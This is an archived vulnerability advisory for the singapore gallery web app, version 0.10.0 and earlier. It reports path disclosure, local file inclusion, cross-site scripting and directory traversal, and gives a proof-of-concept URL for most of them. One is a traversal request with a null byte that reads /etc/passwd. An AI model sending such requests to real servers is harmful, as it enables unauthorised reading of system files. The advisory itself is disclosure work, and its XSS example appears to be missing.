TUCoPS :: Web :: Apps :: b06-3153.htm

singapore gallery <= 0.10.0 Multiple Vulnerabilities
singapore gallery <= 0.10.0 Multiple Vulnerabilities
singapore gallery <= 0.10.0 Multiple Vulnerabilities


Produce       : singapore gallery =0D
Versions      : 0.10.0 and prior=0D
Site : http://www.sgal.org/=0D 
Discovred By  : Moroccan Security Research Team (Simo64)=0D
Greetz        : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid=0D
              .:r00tkita - s4mi - Silitix - tahati -   And All Friends :)=0D
=0D
[-] Vulnerable code near lignes 16-35=0D
=0D
config->base_path.$sg->config->pathto_current_template."index.tpl.php";=0D
?>=0D
=0D
[+] Full Path Disclosure :=0D
**************************=0D
Exemple:=0D
=0D
http://localhost/singapore/index.php?template=simo64=0D 
=0D
Result : =0D
=0D
Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35=0D
=0D
=0D
[+] Local File Inclusion :=0D
***************************=0D
Proof Of Concept :=0D
=0D
http://localhost/singapore/index.php?template=./../../../../etc/passwd%00=0D 
=0D
[+] Cross Site Scripting :=0D
**************************=0D
=0D
http://localhost/singapore/index.php?template==0D 
=0D
[+] Directory Traversal  :=0D
**************************=0D
Proof Of Concept :=0D
=0D
http://localhost/singapore/index.php?gallery=./../../../

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH